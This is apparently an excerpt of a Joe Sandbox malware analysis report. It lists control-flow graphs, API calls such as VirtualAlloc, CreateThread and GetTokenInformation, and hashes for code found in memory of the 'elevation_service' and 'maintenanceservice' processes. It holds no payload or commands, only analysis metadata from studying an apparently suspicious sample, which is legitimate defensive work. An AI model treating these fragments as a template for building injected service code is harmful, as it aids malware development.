                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00995990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 295 995990-99599b 297 9959a1 295->297 298 995a33-995a61 call 9c9b00 295->298 297->298 300 9959a7-9959ab 297->300 308 995a63 298->308 309 995ab4-995aba call 9b1080 298->309 304 995a59 300->304 305 9959b1-9959f3 call 9c2320 300->305 306 995a5b 304->306 307 995a25-995a2d 304->307 305->304 326 9959f5-9959fa 305->326 306->307 318 995a23 306->318 315 995a2f 307->315 316 995a70-995a7b 307->316 308->309 313 995a65 308->313 327 995a83-995a88 call 995df0 309->327 328 995a13 309->328 313->316 315->313 319 995a7d 316->319 320 995a16-995a1e call 9b1470 316->320 324 995a24 318->324 319->320 325 995a7f-995a81 319->325 334 995a96-995ac2 320->334 325->327 330 9959fc 326->330 331 995a51-995a54 call 9c233c 326->331 338 995a8d VirtualAlloc 327->338 328->327 333 995a15 328->333 330->331 336 9959fe-995a02 330->336 331->304 333->320 334->324 339 995ac8 334->339 336->331 338->334 339->324 340 995ace 339->340 340->298
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 655c549b9f886a94e7d5be0656f95a1334282e8075c07f0bc5171c697869af75
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F821D72051FE848FDF6B931C44953BB26A6B7A5324F9B07CBD086C7192C92C4D05D35E
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00998245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 342 998245-998247 343 99824d-99824f 342->343 344 9982d2-9982d7 342->344 345 998251-998260 call 9c72f4 343->345 346 998306-998309 344->346 355 998390-998393 345->355 348 99830b-998311 CloseHandle 346->348 349 99832e-998330 346->349 348->349 351 9982dd-9982e3 349->351 352 998332 349->352 353 9982e9 351->353 354 9983a3-9983a4 351->354 352->351 356 998334 352->356 353->354 360 9982ef 353->360 358 998399 355->358 359 99827e 355->359 357 99f524-99f52e 356->357 362 99f807 357->362 358->359 361 99839f-9983a1 358->361 359->348 363 998284 359->363 364 9982f0-99831c 360->364 361->354 365 99f80d 362->365 366 99f8df-99f8e0 362->366 363->349 377 998322 364->377 378 9981e5 364->378 365->366 368 99f813 365->368 369 9a15a5-9a15aa 366->369 371 99f81b 368->371 372 99f78f 368->372 373 9a15ae-9a15af 369->373 371->366 372->371 375 99f795 372->375 376 9a15b2-9a15b7 373->376 375->362 379 9a15ba-9a15c1 376->379 377->378 382 998328-99832c 377->382 380 9981eb 378->380 381 9982a3-9982a5 378->381 385 9a1750-9a17a2 call 9c72f4 379->385 386 9a15c7-9a15d2 379->386 387 9981f1 380->387 388 9982b2-99836f GetTokenInformation 380->388 383 9983f9 381->383 384 9982ab 381->384 382->349 389 9982c5-9982c8 382->389 383->344 390 9983ff 383->390 384->383 391 9982b1 384->391 393 9a1620-9a1623 386->393 394 9a15d4-9a15d6 386->394 387->388 395 9981f7-99828e 387->395 407 998376-99837b 388->407 389->383 397 9982ce 389->397 390->357 391->388 400 9a16a0-9a16b4 393->400 401 9a1625-9a1628 393->401 403 9a15dc-9a15df 394->403 404 9a1670-9a1684 394->404 398 99828f-998303 call 9c72ec 395->398 397->398 399 9982d0 397->399 398->346 435 99834f-998355 398->435 399->344 399->398 410 9a16b6-9a16b9 400->410 411 9a16f4-9a16f5 400->411 401->379 406 9a162a-9a1636 401->406 403->379 412 9a15e1-9a15f6 403->412 404->369 409 9a168a-9a168d 404->409 415 9a1638-9a1640 406->415 416 9a16dc-9a16ec 406->416 407->364 417 998381 407->417 419 9a172f-9a1738 409->419 420 9a1693-9a1697 409->420 421 9a173a-9a173b 410->421 422 9a16bb 410->422 423 9a16fe-9a170c 411->423 413 9a15fc-9a1600 412->413 414 9a16d2-9a16d7 412->414 413->423 424 9a1606-9a1618 413->424 414->373 426 9a170e-9a1727 415->426 427 9a1646-9a165f 415->427 416->386 425 9a16f2 416->425 417->364 428 998387 417->428 429 9a173f-9a1740 419->429 431 9a16bf-9a16cd 420->431 421->429 422->431 432 9a1744-9a1748 423->432 424->376 425->385 426->386 433 9a172d 426->433 427->386 434 9a1665 427->434 428->355 436 998277-99827a 428->436 429->432 433->385 434->385 440 998341 435->440 441 998212-99821a GetTokenInformation 435->441 438 99827c 436->438 439 998241 436->439 438->359 438->439 439->345 439->407 440->441 442 998347 440->442 443 9983af 441->443 444 998220-998234 441->444 442->415 446 99834d 442->446 443->345 447 9983b5 443->447 451 99823a 444->451 452 9983d7-9983dd 444->452 446->435 447->345 448 9983bb-9983ca 447->448 448->436 457 9983d0 448->457 451->452 453 998240 451->453 456 9ab32e-9ab330 453->456 458 9ab332-9ab337 call 9c72f4 456->458 459 9ab300 456->459 457->436 460 9983d6 457->460 458->459 468 9ab339 458->468 464 9ab2fd 459->464 465 9ab302 459->465 466 9ab2ff 464->466 467 9ab305 464->467 469 9ab308-9ab315 466->469 467->469 470 9ab322-9ab32d 467->470 468->459 471 9ab33b-9ab33f 468->471 469->467 473 9ab317 469->473 470->456 471->469 473->464
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d94446af1396888a6581757143bab7780411ceaaf94c390b59d46c2bbfe0cd57
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0F43451DA518FCE66871D907153FEBA8AF83740B69049EE447CB512CE18DC01D352
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 009983E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 605 9983e7-9983e9 606 9983ef 605->606 607 9982c5-9982c8 605->607 606->607 608 9983f5-9983f7 606->608 609 9983f9 607->609 610 9982ce 607->610 608->609 613 9983ff 609->613 614 9982d2-9982d7 609->614 611 99828f-998303 call 9c72ec 610->611 612 9982d0 610->612 617 998306-998309 611->617 629 99834f-998355 611->629 612->611 612->614 615 99f524-99f52e 613->615 614->617 618 99f807 615->618 620 99830b-998311 CloseHandle 617->620 621 99832e-998330 617->621 622 99f80d 618->622 623 99f8df-99f8e0 618->623 620->621 625 9982dd-9982e3 621->625 626 998332 621->626 622->623 630 99f813 622->630 634 9a15a5-9a15aa 623->634 627 9982e9 625->627 628 9983a3-9983a4 625->628 626->625 631 998334 626->631 627->628 632 9982ef 627->632 636 998341 629->636 637 998212-99821a GetTokenInformation 629->637 638 99f81b 630->638 639 99f78f 630->639 631->615 642 9982f0-99831c 632->642 640 9a15ae-9a15af 634->640 636->637 641 998347 636->641 645 9983af 637->645 646 998220-998234 637->646 638->623 639->638 643 99f795 639->643 644 9a15b2-9a15b7 640->644 648 9a1638-9a1640 641->648 649 99834d 641->649 674 998322 642->674 675 9981e5 642->675 643->618 653 9a15ba-9a15c1 644->653 651 998251-998256 call 9c72f4 645->651 652 9983b5 645->652 669 99823a 646->669 670 9983d7-9983dd 646->670 654 9a170e-9a1727 648->654 655 9a1646-9a165f 648->655 649->629 663 99825b-998260 651->663 652->651 657 9983bb-9983ca 652->657 658 9a1750-9a17a2 call 9c72f4 653->658 659 9a15c7-9a15d2 653->659 654->659 661 9a172d 654->661 655->659 662 9a1665 655->662 705 9983d0 657->705 706 998277-99827a 657->706 667 9a1620-9a1623 659->667 668 9a15d4-9a15d6 659->668 661->658 662->658 673 998390-998393 663->673 671 9a16a0-9a16b4 667->671 672 9a1625-9a1628 667->672 677 9a15dc-9a15df 668->677 678 9a1670-9a1684 668->678 669->670 681 998240 669->681 686 9a16b6-9a16b9 671->686 687 9a16f4-9a16f5 671->687 672->653 682 9a162a-9a1636 672->682 679 998399 673->679 680 99827e 673->680 674->675 689 998328-99832c 674->689 684 9981eb 675->684 685 9982a3-9982a5 675->685 677->653 690 9a15e1-9a15f6 677->690 678->634 683 9a168a-9a168d 678->683 679->680 693 99839f-9983a1 679->693 680->620 702 998284 680->702 694 9ab32e-9ab330 681->694 682->648 695 9a16dc-9a16ec 682->695 696 9a172f-9a1738 683->696 697 9a1693-9a1697 683->697 703 9981f1 684->703 704 9982b2-99836f GetTokenInformation 684->704 685->609 698 9982ab 685->698 699 9a173a-9a173b 686->699 700 9a16bb 686->700 707 9a16fe-9a170c 687->707 689->607 689->621 691 9a15fc-9a1600 690->691 692 9a16d2-9a16d7 690->692 691->707 708 9a1606-9a1618 691->708 692->640 693->628 709 9ab332-9ab337 call 9c72f4 694->709 710 9ab300 694->710 695->659 714 9a16f2 695->714 715 9a173f-9a1740 696->715 711 9a16bf-9a16cd 697->711 698->609 712 9982b1 698->712 699->715 700->711 702->621 703->704 718 9981f7 703->718 721 998376-99837b 704->721 705->706 719 9983d6 705->719 716 99827c 706->716 717 998241 706->717 723 9a1744-9a1748 707->723 708->644 709->710 732 9ab339 709->732 727 9ab2fd 710->727 728 9ab302 710->728 712->704 714->658 715->723 716->680 716->717 717->651 717->721 724 99828e 718->724 721->642 725 998381 721->725 724->611 725->642 731 998387 725->731 729 9ab2ff 727->729 730 9ab305 727->730 733 9ab308-9ab315 729->733 730->733 734 9ab322-9ab32d 730->734 731->673 731->706 732->710 735 9ab33b-9ab33f 732->735 733->730 737 9ab317 733->737 734->694 735->733 737->727
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 60e192b49798a9d5bcc22fe71543ea4703616afd0ee9c71774501148c4b05738
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0903551CA418B9E75871C8461A3FA76CAB537C0B6C489DD467CB522CE28DC42E752
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00998318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 474 998318-99831c 475 998322 474->475 476 9981e5 474->476 475->476 479 998328-99832c 475->479 477 9981eb 476->477 478 9982a3-9982a5 476->478 482 9981f1 477->482 483 9982b2-99836f GetTokenInformation 477->483 480 9983f9 478->480 481 9982ab 478->481 484 99832e-998330 479->484 485 9982c5-9982c8 479->485 486 9983ff 480->486 487 9982d2-9982d7 480->487 481->480 488 9982b1 481->488 482->483 489 9981f7-99828e 482->489 504 998376-99837b 483->504 491 9982dd-9982e3 484->491 492 998332 484->492 485->480 493 9982ce 485->493 496 99f524-99f52e 486->496 499 998306-998309 487->499 488->483 494 99828f-998303 call 9c72ec 489->494 497 9982e9 491->497 498 9983a3-9983a4 491->498 492->491 501 998334 492->501 493->494 495 9982d0 493->495 494->499 517 99834f-998355 494->517 495->487 495->494 503 99f807 496->503 497->498 502 9982ef 497->502 499->484 506 99830b-998311 CloseHandle 499->506 501->496 508 9982f0-99831c 502->508 510 99f80d 503->510 511 99f8df-99f8e0 503->511 507 998381 504->507 504->508 506->484 507->508 513 998387 507->513 508->475 508->476 510->511 515 99f813 510->515 516 9a15a5-9a15aa 511->516 518 998390-998393 513->518 519 998277-99827a 513->519 524 99f81b 515->524 525 99f78f 515->525 526 9a15ae-9a15af 516->526 530 998341 517->530 531 998212-99821a GetTokenInformation 517->531 521 998399 518->521 522 99827e 518->522 527 99827c 519->527 528 998241 519->528 521->522 532 99839f-9983a1 521->532 522->506 536 998284 522->536 524->511 525->524 534 99f795 525->534 535 9a15b2-9a15b7 526->535 527->522 527->528 528->504 533 998251-998260 call 9c72f4 528->533 530->531 537 998347 530->537 540 9983af 531->540 541 998220-998234 531->541 532->498 533->518 534->503 539 9a15ba-9a15c1 535->539 536->484 543 9a1638-9a1640 537->543 544 99834d 537->544 547 9a1750-9a17a2 call 9c72f4 539->547 548 9a15c7-9a15d2 539->548 540->533 545 9983b5 540->545 564 99823a 541->564 565 9983d7-9983dd 541->565 549 9a170e-9a1727 543->549 550 9a1646-9a165f 543->550 544->517 545->533 551 9983bb-9983ca 545->551 553 9a1620-9a1623 548->553 554 9a15d4-9a15d6 548->554 549->548 558 9a172d 549->558 550->548 559 9a1665 550->559 551->519 587 9983d0 551->587 556 9a16a0-9a16b4 553->556 557 9a1625-9a1628 553->557 562 9a15dc-9a15df 554->562 563 9a1670-9a1684 554->563 568 9a16b6-9a16b9 556->568 569 9a16f4-9a16f5 556->569 557->539 566 9a162a-9a1636 557->566 558->547 559->547 562->539 570 9a15e1-9a15f6 562->570 563->516 567 9a168a-9a168d 563->567 564->565 573 998240 564->573 566->543 574 9a16dc-9a16ec 566->574 575 9a172f-9a1738 567->575 576 9a1693-9a1697 567->576 578 9a173a-9a173b 568->578 579 9a16bb 568->579 581 9a16fe-9a170c 569->581 571 9a15fc-9a1600 570->571 572 9a16d2-9a16d7 570->572 571->581 582 9a1606-9a1618 571->582 572->526 584 9ab32e-9ab330 573->584 574->548 583 9a16f2 574->583 585 9a173f-9a1740 575->585 586 9a16bf-9a16cd 576->586 578->585 579->586 588 9a1744-9a1748 581->588 582->535 583->547 589 9ab332-9ab337 call 9c72f4 584->589 590 9ab300 584->590 585->588 587->519 591 9983d6 587->591 589->590 599 9ab339 589->599 595 9ab2fd 590->595 596 9ab302 590->596 597 9ab2ff 595->597 598 9ab305 595->598 600 9ab308-9ab315 597->600 598->600 601 9ab322-9ab32d 598->601 599->590 602 9ab33b-9ab33f 599->602 600->598 604 9ab317 600->604 601->584 602->600 604->595
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE ref: 0099830B
                                                                                                                                                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE ref: 00998369
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.4027543615.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_990000_elevation_service.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 550dec73259b7a6fbc7719f914cfce04594bfe56695529192cea12fb748e64cc
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF0FA3151CA418B9EB58B0CC4A193BA7ACAF23780B3C48ACC447CB422CF2CDC42E752

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:4.6%
                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:62
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                                                                                                                                    execution_graph 3756 c05d50 CreateThread 3758 c05bbc 3756->3758 3757 c05cd4 CreateThread CloseHandle 3757->3758 3758->3757 3759 c05c84 3758->3759 3760 c05c2c 3758->3760 3763 c05d56 CreateThread 3758->3763 3761 c05990 VirtualAlloc 3759->3761 3762 c05dcd 3761->3762 3762->3762 3763->3758 3770 c08201 3772 c08220 3770->3772 3774 c081e5 3770->3774 3771 c0830b CloseHandle 3771->3774 3773 c08357 GetTokenInformation 3773->3774 3774->3771 3774->3772 3774->3773 3775 c08212 GetTokenInformation 3774->3775 3775->3772 3775->3774 3788 c05d22 3789 c05cd4 CreateThread CloseHandle 3788->3789 3792 c05bbc 3788->3792 3789->3792 3790 c05c2c 3791 c05d56 CreateThread 3791->3792 3792->3789 3792->3790 3792->3791 3793 c05c84 3792->3793 3794 c05990 VirtualAlloc 3793->3794 3795 c05dcd 3794->3795 3795->3795 3738 c081e3 3742 c081e5 3738->3742 3739 c08357 GetTokenInformation 3739->3742 3740 c0830b CloseHandle 3740->3742 3741 c08212 GetTokenInformation 3741->3742 3743 c08220 3741->3743 3742->3739 3742->3740 3742->3741 3742->3743 3701 c083e7 3704 c081e5 3701->3704 3702 c0830b CloseHandle 3702->3704 3703 c08212 GetTokenInformation 3703->3704 3706 c08220 3703->3706 3704->3702 3704->3703 3705 c08357 GetTokenInformation 3704->3705 3704->3706 3705->3704 3733 c058de 3734 c153f0 VirtualAlloc 3733->3734 3735 c058f9 3734->3735 3736 c081c0 3 API calls 3735->3736 3737 c05907 3736->3737 3707 c05b8f 3718 c153f0 3707->3718 3709 c05baf 3723 c081c0 3709->3723 3711 c05c2c 3713 c05dcd 3713->3713 3714 c05c84 3729 c05990 3714->3729 3715 c05d56 CreateThread 3717 c05bbc 3715->3717 3716 c05cd4 CreateThread CloseHandle 3716->3717 3717->3711 3717->3714 3717->3715 3717->3716 3719 c153f4 3718->3719 3720 c1545e VirtualAlloc 3719->3720 3722 c153f6 3719->3722 3721 c15460 3720->3721 3721->3719 3722->3709 3726 c081e5 3723->3726 3724 c0830b CloseHandle 3724->3726 3725 c08357 GetTokenInformation 3725->3726 3726->3724 3726->3725 3727 c08212 GetTokenInformation 3726->3727 3728 c08220 3726->3728 3727->3726 3727->3728 3728->3717 3731 c05994 wcscpy 3729->3731 3730 c05a23 3730->3713 3731->3730 3732 c05a8d VirtualAlloc 3731->3732 3732->3731

                                                                                                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00C081C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 0 c081c0-c081d8 1 c083bf-c083ca 0->1 3 c083d0 1->3 4 c08277-c0827a 1->4 3->4 5 c083d6 3->5 6 c08241 4->6 7 c0827c 4->7 11 c083d7-c083dd 5->11 9 c08251-c08256 call c372f4 6->9 10 c08376-c0837b 6->10 7->6 8 c0827e 7->8 12 c08284 8->12 13 c0830b-c08311 CloseHandle 8->13 18 c0825b-c08260 9->18 15 c082f0-c0831c 10->15 16 c08381 10->16 17 c0832e-c08330 12->17 13->17 30 c08322 15->30 31 c081e5 15->31 16->15 21 c08387 16->21 23 c08332 17->23 24 c082dd-c082e3 17->24 22 c08390-c08393 18->22 21->4 21->22 22->8 25 c08399 22->25 23->24 28 c08334 23->28 26 c083a3-c083a4 24->26 27 c082e9 24->27 25->8 32 c0839f-c083a1 25->32 27->26 33 c082ef 27->33 34 c0f524-c0f52e 28->34 30->31 35 c08328-c0832c 30->35 37 c082a3-c082a5 31->37 38 c081eb 31->38 32->26 33->15 36 c0f807 34->36 35->17 39 c082c5-c082c8 35->39 40 c0f80d 36->40 41 c0f8df-c0f8e0 36->41 42 c083f9 37->42 43 c082ab 37->43 44 c081f1 38->44 45 c082b2-c0836f GetTokenInformation 38->45 39->42 48 c082ce 39->48 40->41 49 c0f813 40->49 53 c115a5-c115aa 41->53 50 c082d2-c082d7 42->50 51 c083ff 42->51 43->42 52 c082b1 43->52 44->45 46 c081f7 44->46 45->10 54 c0828e 46->54 55 c082d0 48->55 56 c0828f-c08303 call c372ec 48->56 60 c0f81b 49->60 61 c0f78f 49->61 57 c08306-c08309 50->57 51->34 52->45 59 c115ae-c115af 53->59 54->56 55->50 55->56 56->57 70 c0834f-c08355 56->70 57->13 57->17 63 c115b2-c115b7 59->63 60->41 61->60 64 c0f795 61->64 66 c115ba-c115c1 63->66 64->36 68 c11750-c117a2 call c372f4 66->68 69 c115c7-c115d2 66->69 72 c11620-c11623 69->72 73 c115d4-c115d6 69->73 75 c08341 70->75 76 c08212-c0821a GetTokenInformation 70->76 80 c116a0-c116b4 72->80 81 c11625-c11628 72->81 78 c11670-c11684 73->78 79 c115dc-c115df 73->79 75->76 85 c08347 75->85 82 c08220-c08234 76->82 83 c083af 76->83 78->53 84 c1168a-c1168d 78->84 79->66 88 c115e1-c115f6 79->88 86 c116f4-c116f5 80->86 87 c116b6-c116b9 80->87 81->66 89 c1162a-c11636 81->89 82->11 113 c0823a 82->113 83->9 91 c083b5 83->91 92 c11693-c11697 84->92 93 c1172f-c11738 84->93 94 c11638-c11640 85->94 95 c0834d 85->95 105 c116fe-c1170c 86->105 96 c116bb 87->96 97 c1173a-c1173b 87->97 98 c116d2-c116d7 88->98 99 c115fc-c11600 88->99 89->94 100 c116dc-c116ec 89->100 91->9 101 c083bb-c083bd 91->101 103 c116bf-c116cd 92->103 102 c1173f-c11740 93->102 107 c11646-c1165f 94->107 108 c1170e-c11727 94->108 95->70 96->103 97->102 98->59 104 c11606-c11618 99->104 99->105 100->69 106 c116f2 100->106 101->1 111 c11744-c11748 102->111 104->63 105->111 106->68 107->69 109 c11665 107->109 108->69 112 c1172d 108->112 109->68 112->68 113->11 114 c08240 113->114 115 c1b32e-c1b330 114->115 116 c1b300 115->116 117 c1b332-c1b337 call c372f4 115->117 120 c1b302 116->120 121 c1b2fd 116->121 117->116 125 c1b339 117->125 123 c1b305 121->123 124 c1b2ff 121->124 126 c1b308-c1b315 123->126 127 c1b322-c1b32d 123->127 124->126 125->116 128 c1b33b-c1b33f 125->128 126->123 130 c1b317 126->130 127->115 128->126 130->121
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c96eb43a2584b22a649c2a17c8942c23e83c62d64a0abfd55cccb06b8572ef05
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB14C3051CE458BCB29CB1D84802B5B792FFD6310F68C25DD8E7871E2DE299E86D352
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00C05B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 131 c05b8f-c05c20 call c153f0 call c38358 call c20320 call c081c0 141 c05cf4-c05d08 call c372ec 131->141 142 c05c26 131->142 146 c05c87-c05dc8 call c05e60 call c05990 141->146 147 c05d0e 141->147 142->141 143 c05c2c-c05c2f 142->143 159 c05dcd 146->159 147->146 148 c05d14-c05d18 147->148 152 c05c65 148->152 153 c05daf-c05db6 call c052d0 148->153 155 c05ca3 call c05df0 152->155 156 c05c67 152->156 165 c05c30-c05c39 153->165 166 c05dbc 153->166 168 c05c45-c05d6d call c21520 155->168 156->155 161 c05c69-c05c9d 156->161 159->159 177 c05c85 161->177 178 c05c9f 161->178 180 c05bf7 165->180 181 c05cb9-c05cbd 165->181 169 c05d7d-c05d89 166->169 170 c05dbe 166->170 187 c05bfd-c05c06 168->187 193 c05d73 168->193 182 c05d94 169->182 183 c05d8b-c05d92 169->183 170->169 176 c05d9b 170->176 190 c05d9c 176->190 177->146 178->177 185 c05ca1 178->185 180->181 180->187 188 c05cc3 181->188 189 c05d56-c05d5b CreateThread 181->189 182->143 191 c05cb3 182->191 183->182 183->190 185->155 195 c05da5-c05da8 187->195 188->189 194 c05cc9 188->194 197 c05c7e 189->197 198 c05d1f-c05d45 189->198 190->195 191->143 191->181 193->187 199 c05d79-c05d7b 193->199 194->189 195->153 197->198 200 c05c84 197->200 202 c05cd4-c05cea CreateThread CloseHandle 198->202 203 c05d47 198->203 199->169 200->177 202->183 205 c05cf0-c05d4d 202->205 203->202 205->182
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
